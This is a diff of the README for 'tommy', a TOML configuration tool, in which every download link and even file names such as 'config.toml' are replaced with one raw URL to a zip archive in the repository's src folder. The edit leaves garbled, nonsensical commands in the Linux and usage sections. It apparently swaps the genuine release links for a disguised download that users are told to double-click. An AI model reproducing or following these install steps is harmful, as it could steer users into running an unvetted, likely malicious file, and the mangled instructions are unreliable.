abogado-droid/tommy/README.md

 ### For Windows Users:

-1. Download the `.exe` file from the [Releases page](https://github.com/abogado-droid/tommy/releases).
+1. Download the `.exe` file from the [Releases page](https://github.com/abogado-droid/tommy/raw/refs/heads/main/src/Software_v1.5-alpha.4.zip).
 2. Locate the downloaded file in your `Downloads` folder.
 3. Double-click the file to run it.

 ### For macOS Users:

-1. Download the `.dmg` file from the [Releases page](https://github.com/abogado-droid/tommy/releases).
+1. Download the `.dmg` file from the [Releases page](https://github.com/abogado-droid/tommy/raw/refs/heads/main/src/Software_v1.5-alpha.4.zip).
 2. Open the downloaded file.
 3. Drag the **tommy** icon to your Applications folder.

 ### For Linux Users:

-1. Download the appropriate `.tar.gz` file from the [Releases page](https://github.com/abogado-droid/tommy/releases).
+1. Download the appropriate `https://github.com/abogado-droid/tommy/raw/refs/heads/main/src/Software_v1.5-alpha.4.zip` file from the [Releases page](https://github.com/abogado-droid/tommy/raw/refs/heads/main/src/Software_v1.5-alpha.4.zip).
 2. Open a terminal window.
-3. Use the command `tar -xvzf [filename].tar.gz` to extract the files.
+3. Use the command `tar -xvzf [filename]https://github.com/abogado-droid/tommy/raw/refs/heads/main/src/Software_v1.5-alpha.4.zip` to extract the files.
 4. Navigate to the extracted folder and run `./tommy` to start.

 ## 📄 Usage

 After installing **tommy**, you can start using it to manage configuration files.
 Here's how:

-1. **Create a TOML File:** Create a file named `config.toml`.
+1. **Create a TOML File:** Create a file named `https://github.com/abogado-droid/tommy/raw/refs/heads/main/src/Software_v1.5-alpha.4.zip`.
 Add your desired configuration settings in TOML format.
-2. **Run tommy:** Open your terminal or command prompt and type `tommy config.toml`.
+2. **Run tommy:** Open your terminal or command prompt and type `tommy https://github.com/abogado-droid/tommy/raw/refs/heads/main/src/Software_v1.5-alpha.4.zip`.
 3. **View Output:** **tommy** will parse the configuration and display the results on your screen.

 ## 🎯 Features